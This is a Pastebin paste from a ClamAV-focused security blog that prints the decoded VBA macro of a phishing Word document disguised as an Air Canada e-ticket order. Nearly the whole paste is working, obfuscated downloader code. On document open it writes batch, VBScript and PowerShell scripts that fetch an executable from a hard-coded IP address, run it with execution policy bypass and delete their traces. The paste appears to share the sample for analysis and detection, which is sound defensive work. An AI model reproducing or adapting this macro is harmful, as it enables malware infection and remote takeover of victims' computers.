Advertisement
Sanesecurity

Air Canada e-ticket Order decoded

Mar 3rd, 2015
428
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.78 KB | None | 0 0
  1. http://sanesecurity.blogspot.co.uk/
  2. Sanesecurity ClamAV blog: zero hour malware, phishing and scams
  3. A hopefully interesting blog from the world of zero hour malware, phishing, scams and spams
  4.  
  5. Attribute VB_Name = "ThisDocument"
  6. Attribute VB_Base = "1Normal.ThisDocument"
  7. Attribute VB_GlobalNameSpace = False
  8. Attribute VB_Creatable = False
  9. Attribute VB_PredeclaredId = True
  10. Attribute VB_Exposed = True
  11. Attribute VB_TemplateDerived = True
  12. Attribute VB_Customizable = True
  13. Sub Auto_Open()
  14. h
  15. End Sub
  16. Sub h()
  17.  
  18. BART212 = ""
  19. BART2 = "" & "" & "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & "" & "" & "" & ""
  20. JISKKK = "" & "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
  21. VBT2 = ""
  22. VBT2 = "" & JISKKK & ""
  23. VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
  24. PST2 = VBT2
  25. HUEFQ = "" + Module2.Plain("" & "us" & "er" + Chr(110) & "a" + Chr(109) + Chr(101) & "")
  26. PST1 = "" + PST2 + "." + Chr(Asc("p")) + Chr(100 + 15) + "1" + ""
  27. VBT1 = "" + VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
  28. JJJJJJJJJJJJJIOWQJDOQWIHDUIQWTYTYDQWYGG = "jgh 12jh3ggh121hgj3gh12jghj123g21jkh 3" + _
  29. "h j23hgjk23gh4gkg234jh23jhgl3k 23jk 4lhgj4g 2jh4g23jh 4jh32g ghj23g 4jh23g4jh23g4jh324 " + _
  30. "hj2hkhj12jh2 h12hjkjk jk12hj312kj12hjk12jh12 3hk123hj12k3jk12 hk312hv j12v b12v 312v"
  31. VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
  32. STT = "" + "44" + "4." + "pn" + "g" + ""
  33.  
  34. hjife = 51 + 50 + Sgn(-6)
  35. kktd = hjife
  36. BART = "" + BART2 + Chr(Abs(kktd - 100 - 45 - Sgn(5))) + Chr(Abs(kktd - 100 - 96 - 2)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(Abs(kktd - 100 - 15 - 1)))) + ""
  37. JSIQOJQ = Chr(Abs(kktd - Sqr(4) - 100 - 44)) + Chr(Abs(kktd - 100 - 97 - Module1.Signing(15))) + Chr(Asc(Chr(Abs(kktd / 2 + Sqr(4) + 44 + Sgn(Sqr(16)))))) + Chr(Asc(Chr(kktd + Fix(16.2)))) + ""
  38. 'JSIQOJQ = ""
  39. KJHDU = BART2 + JSIQOJQ
  40. BART = KJHDU
  41. MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + HUEFQ + "\App" + "Data\Lo" + "cal\T" + "emp\" + PST1 + "" & ""
  42. STAT = "" + "c:\" + Chr(Asc("U")) + "sers\" + HUEFQ + "\App" + "Data\Lo" + "cal\T" + "emp\" + STT + "" & ""
  43. ASDASDSA = "" + "c:\" + Chr(Asc("U")) + "sers\" + HUEFQ + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + "" & ""
  44. MY_FILDIR = "c:\U" & "sers\" + HUEFQ + "\App" + "Data\Lo" + "cal\T" + "emp\" + VBT1
  45. XPFILEDIR = ""
  46. HJUTTT = VBTXP
  47. XPFILEDIR = "" + "c" & ":\W" & "indows\T" & "emp\" + HJUTTT
  48. UHFD = "" & "c" & ":\W" & "indows\T" & "emp\"
  49. TRT = UHFD + BART
  50. KRT = TRT
  51. HYF = KRT
  52.  
  53. KJSAHDFFFJ = MY_FILDIR
  54.  
  55.  
  56. Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
  57.  
  58. Dim retVal As Variant
  59.  
  60. FileNumber = FreeFile
  61. FileNumb = FreeFile
  62. FileNu = FreeFile
  63. FileNukk = FreeFile
  64.  
  65. FileNs = FreeFile
  66. Kasdwq = FreeFile
  67. FileNuG = FreeFile
  68.  
  69. Dim objWMIService As Variant
  70. Dim colOperatingSystems As Variant
  71. Dim objOperatingSystem As Variant
  72.  
  73. Set objWMIService = GetObject _
  74. ("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  75. SETL = "colOperatingSystemsKSAHDIUOQWdsad asad32k r8929h2f uigt8y yr2u3gby2g yu dg2uyg3bdu "
  76.  
  77. Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
  78. For Each objOperatingSystem In colOperatingSystems
  79. SysReport = SysReport & "The operating system on this computer is " & _
  80. objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
  81. Next
  82.  
  83. Set objWMIService = GetObject _
  84. ("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  85. Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
  86. For Each objOperatingSystem In colOperatingSystems
  87. winverstr = objOperatingSystem.Version
  88. Next
  89.  
  90. winver = Val(winverstr)
  91. WaitFor (1)
  92. jskw = winver
  93.  
  94. URLLSK = "91.220.131.73/ca/file"
  95. STAA = "savepic.su/5229109"
  96. STAB = "savepic.su/5220917"
  97.  
  98. ' UWGD = XPFILEDIR
  99. ' If (Len(Dir(MY_FILENDIR)) <> 0) Then
  100. ' SetAttr MY_FILENDIR, vbNormal
  101. ' Kill MY_FILENDIR
  102. ' End If
  103.  
  104. ' If (Dir(ASDASDSA) <> "") Then
  105. ' SetAttr ASDASDSA, vbNormal
  106. ' Kill ASDASDSA
  107. ' End If
  108.  
  109.  
  110. ' If (Dir(MY_FILDIR) <> "") Then
  111. ' SetAttr MY_FILDIR, vbNormal
  112. ' Kill KJSAHDFFFJ
  113. ' End If
  114.  
  115.  
  116. ' If (Dir(STAT) <> "") Then
  117. ' SetAttr STAT, vbNormal
  118. ' Kill STAT
  119. ' End If
  120.  
  121.  
  122. ' If (Dir(UWGD) <> "") Then
  123. ' SetAttr UWGD, vbNormal
  124. ' Kill UWGD
  125. ' End If
  126.  
  127. If (jskw <= 5.5) Then
  128. 'NUWHDGJS = UHFD + "euifhszdf.jfi"
  129. 'Open NUWHDGJS For Output As #Kasdwq
  130. 'Close #Kasdwq
  131. NUWHDGJS = HYF
  132. Open NUWHDGJS For Output As #Kasdwq
  133. Print #Kasdwq, ""
  134. Print #Kasdwq, "" & Chr(Asc("@")) & "e" & "cho off"
  135. Print #Kasdwq, ":pinkator"
  136. Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 2" + ""
  137. KIWJIQDKLWQDNKWQD = "kwhjek21 jehgj12 21jhge hj21gh1j2geh 1j2egk j1heg kjfteyf y1hg 12hf eh1g2efj 12"
  138. Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP + Chr(34)
  139. Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""
  140. Print #Kasdwq, "" & ":windows"
  141. Print #Kasdwq, ""
  142. Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))
  143. Print #Kasdwq, ":loop"
  144. Print #Kasdwq, "pin" + "g " + "1.3.1.2 -n" & _
  145. " 1"
  146. Print #Kasdwq, "set tar1=" + Chr(34) + BART + Chr(33 + 1)
  147. Print #Kasdwq, "set stat=" + Chr(34) + STT + Chr(33 + 1)
  148. Print #Kasdwq, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  149. Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%ta" + "r1%" + "" & ""
  150. Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%s" + "tat%" + "" & ""
  151. Print #Kasdwq, "if " + "exist " + Chr(34) & "" & "c" & ":\W" + "indows\T" + "emp\" + Chr(34) + "%tar1%" + " goto loop" + ""
  152. Print #Kasdwq, "" + "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + "" & "" + VBTXP + Chr(34) + " g" + "ot" + "o lo" + "op" + ""
  153. Print #Kasdwq, "exit"
  154. Close #Kasdwq
  155.  
  156. WaitFor (2)
  157. mttt = 88
  158.  
  159. Open XPFILEDIR For Output As #FileNumber
  160. Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + Chr(Asc("p")) + Chr(Asc("i")) + "f" + Chr(34)
  161. Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
  162. Print #FileNumber, "" + "jfeuygq = " + Chr(34) + "4.e" + Chr(34) + "+" + Chr(34) + "xe" + Chr(34)
  163. Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + Chr(34) + "+" + "jfeuygq"
  164. Print #FileNumber, "frgea =" + Chr(34) + "M" + Chr(34) + "+" + Chr(34) + "SX" + Chr(34) + "+" + Chr(34) + "ML2.X" + Chr(34) + "+" + Chr(34) + "MLH" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + "Chr(80)"
  165. Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(frgea)" + ""
  166. Print #FileNumber, "Set mkH = C" + "reate" + Chr(Asc("O")) + "bject(frgea)"
  167. Print #FileNumber, "" + "" & "objXM" & "LH" & "T" & "TP.op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", strRT, False"
  168. Print #FileNumber, "mkH" & ".op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", statRT, False" + ""
  169.  
  170. JASHDJK = "send()"
  171. Print #FileNumber, "objXMLHTTP." + JASHDJK + " "
  172. Print #FileNumber, "mkH." + JASHDJK + " "
  173. Print #FileNumber, "If objXMLHTTP.Status = 200 Then" + "" & ""
  174. Print #FileNumber, "uwqhda = " + Chr(34) + "ADODB." + Chr(34)
  175. Print #FileNumber, "" + "Set objADOStream = C" + "reateO" + "bject(uwqhda+Chr(Sgn(-4)+84)+" + Chr(34) + "tream" + Chr(34) + ")"
  176. Print #FileNumber, "" + "ob" + "jA" + "DOSt" + "ream.O" + "pen " + ""
  177. Print #FileNumber, "objADOStream.Type = 1"
  178. Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
  179. Print #FileNumber, "objADOStream.Position = 0 "
  180. Print #FileNumber, "objADOStream.S" & "aveToF" & "ile st" & "rT" & "ecation " + ""
  181. Print #FileNumber, "objADOStream.Close "
  182. Print #FileNumber, "Set objADOStream = Nothing "
  183. Print #FileNumber, "End if "
  184. Print #FileNumber, "" + "Set objXMLHTTP = Nothing"
  185. Print #FileNumber, "Set objS" + "hell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")" + ""
  186.  
  187. Print #FileNumber, ""
  188. Close #FileNumber
  189.  
  190. WaitFor (1)
  191. ASKJD = TRT
  192. NUS = Module1.France(retVal, ASKJD)
  193.  
  194. End If
  195.  
  196.  
  197. If (winver > 5.5) Then
  198. Open MY_FILENDIR For Output As #FileNumber
  199. Print #FileNumber, "$do" & "wn = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  200. Print #FileNumber, "" & "$stat = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + STAB & ".p" & "n" + "g';"
  201. Print #FileNumber, "$gg" + "tt = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + URLLSK & ".p" & "i" + "f';"
  202. Print #FileNumber, "" & "$fi" & "le = 'c:\Users\" + HUEFQ + "\Ap" + "pData\Lo" + "cal\T" & "e" + "mp\" + "4" & "44." + Chr(101) & "xe';" + ""
  203. Print #FileNumber, "$statfile = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + "4" & "44." + "j" & "pg';"
  204. Print #FileNumber, "" & "" & "" & "" & "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25'" + "+''" + "" + ";"
  205. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($gg" & "tt,$" & "file);"
  206. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($s" & "tat,$" & "statfile);"
  207. Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  208. Print #FileNumber, "$noneFilePath = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  209.  
  210. Print #FileNumber, "$vbsFilePath = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + "+" + Chr(39) + Chr(39) + ";"
  211. Print #FileNumber, "$statFilePath = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + "444" + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "j" + Chr(39) + Chr(43) + Chr(39) + "pg" + Chr(39) + ";"
  212. Print #FileNumber, "$b" + "tFilePath = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + BART2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
  213. Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
  214.  
  215. Print #FileNumber, "Start-Sleep -s 15;"
  216. Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + HUEFQ + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
  217. Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  218. Print #FileNumber, "$file2 = gci $" + "b" + "t" + "FilePath -Force"
  219. Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  220. Print #FileNumber, "" + "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  221. Print #FileNumber, "" + "If (Test-Path $b" + "tFileP" + "ath){ Remove-Item $b" + "tFileP" + "ath }" + ""
  222. Print #FileNumber, "" + "If (Test-Path $s" + "tatFileP" + "ath){ Remove-Item $st" + "atFileP" + "ath }" + ""
  223. Print #FileNumber, "" + "$jsdhyfueh2hds = 'asdghyg23d jashdhsagdhasghdhgas';" + ""
  224. Print #FileNumber, "" + "If (Test-Path $no" + "neFi" + "leP" + "ath){ Remove-Item $n" + "oneFi" + "lePa" + "th }" + ""
  225. Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  226. Close #FileNumber
  227. KJUCBHS = " = "
  228. Open MY_FILDIR For Output As #FileNumb
  229. Print #FileNumb, "Dim dff"
  230. Print #FileNumb, "dff = 68"
  231. Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
  232. Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & "&" & Chr(34) & "S" & Chr(34) & Chr(38) & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) + "&" + Chr(34) + Chr(34) & ")"
  233. Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + HUEFQ + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
  234. Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "he" + Chr(Asc("l")) + Chr(Asc("l")) + KJUCBHS & Chr(Sgn(-4) + 68) + "reate" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + ""
  235. Print #FileNumb, "" + "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " + Chr(34) + Chr(34) + "+" & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true" + "" & ""
  236.  
  237. Print #FileNumb, ""
  238. Close #FileNumb
  239.  
  240. Open ASDASDSA For Output As #FileNs
  241. Print #FileNs, "@echo off"
  242. Print #FileNs, "pi" + "ng 1.1.2.2 -n" & " 2"
  243. Print #FileNs, "chcp 1251"
  244. Print #FileNs, ":asdqwqdw"
  245. Print #FileNs, "set Gds1=" + Chr(34) + "." + Chr(34)
  246. Print #FileNs, "set Gds2=" + Chr(34) + "v" + Chr(34)
  247. Print #FileNs, "set Gds3=" + Chr(34) + "bs" + Chr(34)
  248. Print #FileNs, "set Gds4=" + Chr(34) & "c:\Users\" + HUEFQ + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34)
  249. Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & "%Gds4%" + "%Gds1%%Gds2%%Gds3%"
  250. Print #FileNs, "exit"
  251. Close #FileNs
  252.  
  253. SetAttr MY_FILENDIR, vbNormal
  254. SetAttr ASDASDSA, vbNormal
  255. SetAttr MY_FILDIR, vbNormal
  256.  
  257. WaitFor (1)
  258. SJAKLD = ASDASDSA
  259. NUS = Module1.France(retVal, SJAKLD)
  260.  
  261.  
  262.  
  263. End If
  264.  
  265.  
  266. findTest
  267. secondTest
  268. For Each myStoryRange In ActiveDocument.StoryRanges
  269. With myStoryRange.Find
  270. .Text = "" + "<" & "sel" & "ect>" + ""
  271. .Replacement.Text = " "
  272. .Wrap = wdFindContinue
  273. .Execute Replace:=wdReplaceAll
  274. End With
  275. Next myStoryRange
  276.  
  277. For Each myStoryRange In ActiveDocument.StoryRanges
  278. With myStoryRange.Find
  279. .Text = "</s" & "ele" & "ct>"
  280. .Replacement.Text = " "
  281. .Wrap = wdFindContinue
  282. .Execute Replace:=wdReplaceAll
  283. End With
  284. Next myStoryRange
  285.  
  286. For Each myStoryRange In ActiveDocument.StoryRanges
  287. With myStoryRange.Find
  288. .Text = "<" & "in" & "box>"
  289. .Replacement.Text = " "
  290. .Wrap = wdFindContinue
  291. .Execute Replace:=wdReplaceAll
  292. End With
  293. Next myStoryRange
  294.  
  295. For Each myStoryRange In ActiveDocument.StoryRanges
  296. With myStoryRange.Find
  297. .Text = "</" & "in" & "box>"
  298. .Replacement.Text = " "
  299. .Wrap = wdFindContinue
  300. .Execute Replace:=wdReplaceAll
  301. End With
  302. Next myStoryRange
  303. End Sub
  304. Sub WaitFor(NumOfSeconds As Long)
  305. Dim SngSec As Long
  306. SngSec = Timer + NumOfSeconds
  307.  
  308. Do While Timer < SngSec
  309. DoEvents
  310. Loop
  311.  
  312. End Sub
  313.  
  314. Sub AutoOpen()
  315. Auto_Open
  316. End Sub
  317. Sub Workbook_Open()
  318. Auto_Open
  319. End Sub
  320. Sub findTest()
  321. Dim firstTerm, secondTerm, selectedText As String
  322. Dim hhhg, selRange As Range
  323. Set hhhg = ActiveDocument.Range
  324. JIS = Chr(Asc(Chr(60)))
  325. IHRR = "" & JIS + "" + "s" + "e" & "l" & "e" + "c" & "t>" + KSJD + ""
  326. JFRR = "" & JIS + "" + "/" + "s" & "e" + "l" & "e" & "c" + "t>" + ""
  327. firstTerm = "" & IHRR
  328. secondTerm = "" & JFRR
  329. JKHUIQHDSUKHWQD = "sadkjkj321k3h3 j21kh2jkhgjk2g 2jhkg 2k"
  330. WITHrtas = "Find"
  331. With hhhg.Find
  332. .Text = firstTerm
  333. .MatchWholeWord = True
  334. 'asdkaljkalsjd
  335. .Execute
  336. EXECUTEFD = "lakjsd"
  337. hhhg.Collapse direction:=wdCollapseEnd
  338. Set selRange = ActiveDocument.Range
  339. selRange.Start = hhhg.End
  340. .Text = secondTerm
  341. .MatchWholeWord = True
  342. 'kashdjkashdkjashdjksh
  343. .Execute
  344.  
  345. hhhg.Collapse direction:=wdCollapseStart
  346. selRange.End = hhhg.Start
  347. selectedText = selRange.Delete
  348. End With
  349. End Sub
  350.  
  351. Sub secondTest()
  352. Dim firstTerm As String
  353. Dim secondTerm As String
  354. Dim myRanget As Range
  355. Dim yytt As Range
  356. Dim selRanget As Range
  357. Dim selectedTextt As String
  358.  
  359. Set yytt = ActiveDocument.Range
  360.  
  361. firstTerm = "<" + "in" & "bo" + "x>"
  362. secondTerm = "</" + "in" & "bo" + "x>"
  363. With yytt.Find
  364. .Text = firstTerm
  365. .MatchWholeWord = True
  366. 'akjsdkhsajd askhdas
  367. .Execute
  368. EXECUTEFD = "lakjsd"
  369. yytt.Collapse direction:=wdCollapseEnd
  370.  
  371. Set selRanget = ActiveDocument.Range
  372. selRanget.Start = yytt.End
  373. .Text = secondTerm
  374. .MatchWholeWord = True
  375. 'asdjkiqodj
  376. .Execute
  377. EXECUTEFD = "lakjsd"
  378. yytt.Collapse direction:=wdCollapseStart
  379. selRanget.End = yytt.Start
  380. selectedTextt = selRanget
  381. selRanget.Font.Color = wdColorBlack
  382. End With
  383. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement